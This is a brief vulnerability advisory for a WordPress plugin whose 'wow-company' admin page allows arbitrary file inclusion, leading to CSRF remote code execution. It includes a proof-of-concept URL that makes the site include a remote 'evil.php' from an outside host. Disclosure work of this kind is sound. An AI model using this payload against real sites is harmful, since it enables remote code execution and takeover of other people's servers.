The plugin within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's allow_url_include must be set to "On"
2021-12-05 (about 1 years ago)
2021-12-09 (about 1 years ago)
2022-04-11 (about 11 months ago)